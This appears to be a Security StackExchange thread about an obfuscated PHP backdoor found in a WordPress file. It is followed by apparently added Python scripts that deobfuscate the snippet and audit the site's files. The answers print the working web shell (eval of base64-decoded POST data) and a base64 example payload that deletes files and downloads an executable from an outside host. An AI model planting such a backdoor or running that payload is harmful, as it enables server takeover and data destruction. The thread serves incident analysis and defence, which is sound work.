
My site is built using Wordpress. One day it stopped working and I found an error in one PHP file.

When I downloaded that PHP file to see what happened, my antivirus (Microsoft Security Essentials) detected it as a threat and deleted the downloaded file.

Luckily I can access my hosting's cPanel and edit the problematic PHP file from there.

I found that some unusual code is appended at the start of the code. (I deleted the code and everything works fine, for now)

Here's the code:

<?php $lro89 = "t_cepodas6b4";$gmat6 =strtolower( $lro89[10]. $lro89[7]. $lro89[8]. $lro89[3] . $lro89[9].$lro89[11].$lro89[1] . $lro89[6].$lro89[3]. $lro89[2].$lro89[5].$lro89[6].$lro89[3]);$scs1 =strtoupper ( $lro89[1]. $lro89[4]. $lro89[5].$lro89[8]. $lro89[0]); if (isset (${$scs1 }[ 'n3d9ebc' ])) {eval($gmat6( ${ $scs1} ['n3d9ebc' ])) ;}?>

Reformatted for readability:

<?php
$lro89 = "t_cepodas6b4";
$gmat6 =strtolower( $lro89[10]. $lro89[7]. $lro89[8]. $lro89[3] . $lro89[9].$lro89[11].$lro89[1] . $lro89[6].$lro89[3]. $lro89[2].$lro89[5].$lro89[6].$lro89[3]);
$scs1 =strtoupper ( $lro89[1]. $lro89[4]. $lro89[5].$lro89[8]. $lro89[0]);
if (isset (${$scs1 }[ 'n3d9ebc' ])) {
    eval($gmat6( ${ $scs1} ['n3d9ebc' ])) ;
}
?>

I have a few questions:

  1. What does the code do?
  2. Does it mean that there's a virus?
  3. How can it be injected into only this one file?
topher

  • Also, [this](http://security.stackexchange.com/questions/39231/how-do-i-deal-with-a-compromised-server) is some good reading. You are most likely still infected. – Anders Dec 22 '16 at 07:00
  • Another "evil PHP file" question, and yet again the Wordpress tag is present. When will people learn to not use that piece of crap and move to sane alternatives? Also beware of any host that uses CPanel - that's full of vulnerabilities as well. – André Borie Dec 22 '16 at 09:00
  • @AndréBorie I would like to know more about Wordpress and CPanel vulnerabilities, and also want to move to the better alternatives. Can you please tell me more? What are the better options? – topher Dec 23 '16 at 15:18
  • @topher Ghost is a pretty good Wordpress alternative. As for CPanel there is no good alternative as they all suck. The best workaround is to learn command-line system administration so you don't have to rely on those crappy web interfaces. – André Borie Dec 23 '16 at 15:49

2 Answers


What does the code do?

<?php
    if (isset($_POST['n3d9ebc'])) {
        eval(base64_decode($_POST['n3d9ebc']));
    }
?>

It does Remote Code Execution. If this were a $_GET[] parameter, it means an attacker could do this:

hxxp://yoursite.com/hax.php?n3d9ebc=base64-encoded-malicious-php-code

But since it's a $_POST[] parameter, it'll be sent as part of a submission. When the POST parameter, n3d9ebc, is set, it will attempt to evaluate the condition after it's been base64 decoded.

Example payload:

c2hlbGxfZXhlYygicm0gLXJmIH4vaGlsbGFyeS1lbWFpbHM7IHdnZXQgaHR0cHM6Ly93d3cucHV0aW4ucnUvZmFuY3ktYmVhci5leGUgLU8gYXB0MjguZXhlICYmIHN1ZG8gbXYgYXB0MjguZXhlIC91c3Ivc2JpbjsgZWNobyBTSFVUIFVQIFRISVMgSVMgQSBKT0tFIik7

The above will do... um... figure it out.

Just by posting to your site, they have full Remote Code Execution on your web server. You've essentially been pwned. Time for a clean up, and make sure you upgrade vulnerable components.

Does it mean that there's a virus?

Technically? They can do whatever they want on your website. It's basically a backdoor.

How can it be injected into only this one file?

You probably have some kind of vulnerability which allows them to write to a file on the web server. Could be any number of issues. Kind of broad, but it could be chmod 777, a Remote File Inclusion issue, or some other Remote Code Execution backdoor or vulnerability.

Mark Buffalo

  • The URL should be https://www.base64decode.org/ (not encode). – A.L Dec 22 '16 at 08:46
  • @A.L Fixed, but I figured people could click the "decode" button. – Mark Buffalo Dec 22 '16 at 17:03
  • @Walfrat Yep, but I am adding that as an example. Will update for clarity. – Mark Buffalo Dec 22 '16 at 17:04
  • In fact I was talking about the next quoted block; I didn't notice the GET parameter. In the PHP code it's `$_POST`, so the payload is in the request body, not the URL. I don't want to be annoying or pedantic about it, but it can be confusing for beginners^^' – Walfrat Dec 25 '16 at 15:34
  • @Walfrat No, it's fine. You should be "annoying and pedantic" about these things. Yeah, I admit this is confusing to beginners, so I'm going to edit it. – Mark Buffalo Dec 25 '16 at 18:31
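Added worked example, not part of either answer: the cleaned-up PHP above was obtained by hand, but the same deobfuscation can be done statically. The Python script below evaluates the string-building statements from the question's snippet (character picks from a literal, joined, then strtolower/strtoupper) and reports which function and superglobal the eval() actually reaches, without executing any PHP. The SAMPLE constant is the snippet as posted in the question; the regexes are written for this particular index-concatenation pattern, so treating them as a general PHP deobfuscator is an assumption beyond what the page shows.

```python
import re

# Verbatim copy of the obfuscated line quoted in the question; it is the only input this script needs.
SAMPLE = (
    '<?php $lro89 = "t_cepodas6b4";'
    '$gmat6 =strtolower( $lro89[10]. $lro89[7]. $lro89[8]. $lro89[3] . $lro89[9].$lro89[11].$lro89[1] . '
    '$lro89[6].$lro89[3]. $lro89[2].$lro89[5].$lro89[6].$lro89[3]);'
    '$scs1 =strtoupper ( $lro89[1]. $lro89[4]. $lro89[5].$lro89[8]. $lro89[0]); '
    "if (isset (${$scs1 }[ 'n3d9ebc' ])) {eval($gmat6( ${ $scs1} ['n3d9ebc' ])) ;}?>"
)

# $name = "literal";
STRING_ASSIGN = re.compile(r'\$(\w+)\s*=\s*"([^"]*)"\s*;')
# $name = strtolower( $src[i]. $src[j] ... );   (case function and parentheses are optional)
INDEX_ASSIGN = re.compile(
    r'\$(\w+)\s*=\s*(strtolower|strtoupper)?\s*\(?\s*'
    r'((?:\$\w+\s*\[\s*\d+\s*\]\s*\.?\s*)+)\)?\s*;')
INDEX_REF = re.compile(r'\$(\w+)\s*\[\s*(\d+)\s*\]')
# eval($fn( ${$sg}['key'] ))  -- a variable function applied to a variable-variable superglobal lookup
EVAL_CALL = re.compile(
    r"eval\s*\(\s*\$(\w+)\s*\(\s*\$\{\s*\$(\w+)\s*\}\s*\[\s*'([^']*)'\s*\]\s*\)\s*\)")


def resolve_strings(src):
    """Evaluate the string-building statements statically and return {variable: value}."""
    values = {name: literal for name, literal in STRING_ASSIGN.findall(src)}
    for name, case_fn, expr in INDEX_ASSIGN.findall(src):
        # Each $src[i] picks one character out of an already-known string.
        text = ''.join(values[ref][int(i)] for ref, i in INDEX_REF.findall(expr))
        if case_fn == 'strtolower':
            text = text.lower()
        elif case_fn == 'strtoupper':
            text = text.upper()
        values[name] = text
    return values


def analyse(src):
    """Return what the eval() really calls, or None if the pattern is not present."""
    m = EVAL_CALL.search(src)
    if not m:
        return None
    fn_var, sg_var, key = m.groups()
    values = resolve_strings(src)
    return {
        'decoder': values.get(fn_var, '$' + fn_var),   # function wrapped around the input
        'source': values.get(sg_var, '$' + sg_var),    # superglobal the input is read from
        'parameter': key,                              # request parameter carrying the payload
    }


def deobfuscate(src):
    """Render the equivalent plain PHP statement, or None if the pattern is absent."""
    info = analyse(src)
    if info is None:
        return None
    return "eval({decoder}(${source}['{parameter}']));".format(**info)


if __name__ == '__main__':
    print(analyse(SAMPLE))
    print(deobfuscate(SAMPLE))
```

Running it on the question's snippet yields base64_decode as the function, _POST as the superglobal and n3d9ebc as the parameter, i.e. exactly the cleaned-up code shown in the answer. The useful habit this illustrates is resolving what the code would do on paper (or in a script like this) rather than executing a suspicious file to find out.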

Your Wordpress got compromised.

What does the code do?

It's a mildly obfuscated minimal web shell. It takes the POST parameter n3d9ebc, base64-decodes it and executes the result as PHP code. This means that an attacker could use the script to execute arbitrary code on your server at any time.

That's the cleaned-up code:

<?php
if (isset($_POST['n3d9ebc'])) {
    eval(base64_decode($_POST['n3d9ebc']));
}
?>

The variable names were obfuscated to make the script harder to read and to prevent automated detection. The base64 conversion is another measure to help against IDS. Since it's a POST parameter, the attacker's commands also don't show up in the server logfiles.

Does it mean that there's a virus?

It means somebody got write access to your Wordpress (maybe via vulnerable plugins) and uploaded this script as a backdoor.

How can it be injected into only this one file?

Well, it has to be put somewhere. Attackers often decide to append malicious code to an existing file since it's less noticeable than creating a new one.

(I deleted the code and everything works fine, for now)

Can you be sure that there are no more backdoors? If you got compromised, the best way to proceed is a fresh installation.

Arminius
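Added example, not part of Arminius's answer: the answer's point that you cannot be sure this was the only backdoor is usually checked by comparing the deployed tree against a pristine copy of the same WordPress release and reviewing everything that differs. The Python below builds a constructed pristine tree and a constructed tampered copy in a temporary directory (the cleaned-up backdoor from the answers is prepended to one existing file and dropped as a second file, mirroring how the thread describes the injection), then reports modified, added and missing files and lists rough indicators (eval, base64_decode, variable-variable syntax) in the flagged ones. File names and contents are stand-ins, not real WordPress files.

```python
import hashlib
import os
import re
import tempfile

# Constructed sample content: a stand-in for a stock front controller, and the
# cleaned-up backdoor from the answers above (used here only as file content).
CLEAN_INDEX_PHP = (
    "<?php\n"
    "// Stand-in for a stock front controller (constructed, not real WordPress code).\n"
    "require __DIR__ . '/wp-blog-header.php';\n"
)
BACKDOOR = (
    "<?php if (isset($_POST['n3d9ebc'])) { eval(base64_decode($_POST['n3d9ebc'])); } ?>\n"
)

# Rough indicators worth a manual look in any file the hash comparison flags.
SUSPICIOUS = re.compile(r"eval\s*\(|base64_decode\s*\(|\$\{\s*\$\w+\s*\}")


def sha256_of(path):
    h = hashlib.sha256()
    with open(path, 'rb') as f:
        for chunk in iter(lambda: f.read(65536), b''):
            h.update(chunk)
    return h.hexdigest()


def hash_tree(root):
    """Map every file under root (path relative to root, '/' separated) to its SHA-256."""
    digests = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            digests[os.path.relpath(full, root).replace(os.sep, '/')] = sha256_of(full)
    return digests


def compare_trees(pristine_root, deployed_root):
    p, d = hash_tree(pristine_root), hash_tree(deployed_root)
    return {
        'modified': sorted(f for f in p if f in d and p[f] != d[f]),
        'added': sorted(f for f in d if f not in p),
        'missing': sorted(f for f in p if f not in d),
    }


def indicators_in(path):
    with open(path, encoding='utf-8', errors='replace') as f:
        text = f.read()
    return sorted({re.sub(r'\s+', '', m) for m in SUSPICIOUS.findall(text)})


def audit(pristine_root, deployed_root):
    """Hash comparison first, then an indicator scan over everything that differs."""
    report = compare_trees(pristine_root, deployed_root)
    report['indicators'] = {
        f: indicators_in(os.path.join(deployed_root, f))
        for f in report['modified'] + report['added']
    }
    return report


def build_demo():
    """Create a pristine tree and a tampered deployed tree in a temp dir (constructed data)."""
    base = tempfile.mkdtemp(prefix='wp-integrity-')
    pristine = os.path.join(base, 'pristine')
    deployed = os.path.join(base, 'deployed')
    for root in (pristine, deployed):
        os.makedirs(os.path.join(root, 'wp-content', 'uploads'))
        with open(os.path.join(root, 'index.php'), 'w') as f:
            f.write(CLEAN_INDEX_PHP)
        with open(os.path.join(root, 'wp-blog-header.php'), 'w') as f:
            f.write("<?php\n// Untouched file, identical in both trees.\n")
    # Tampering as described in the thread: code prepended to an existing file,
    # plus a standalone copy dropped into a writable upload directory.
    with open(os.path.join(deployed, 'index.php'), 'w') as f:
        f.write(BACKDOOR + CLEAN_INDEX_PHP)
    with open(os.path.join(deployed, 'wp-content', 'uploads', 'cache.php'), 'w') as f:
        f.write(BACKDOOR)
    return pristine, deployed


if __name__ == '__main__':
    pristine, deployed = build_demo()
    for key, value in audit(pristine, deployed).items():
        print(key, value)
```

For the WordPress core files themselves, WP-CLI's `wp core verify-checksums` performs the same comparison against the official release checksums; plugins, themes and the uploads directory still need a comparison against known-good copies like the one above, and anything the audit flags that you cannot explain is a reason to follow the answer's advice and reinstall from clean sources rather than delete one snippet.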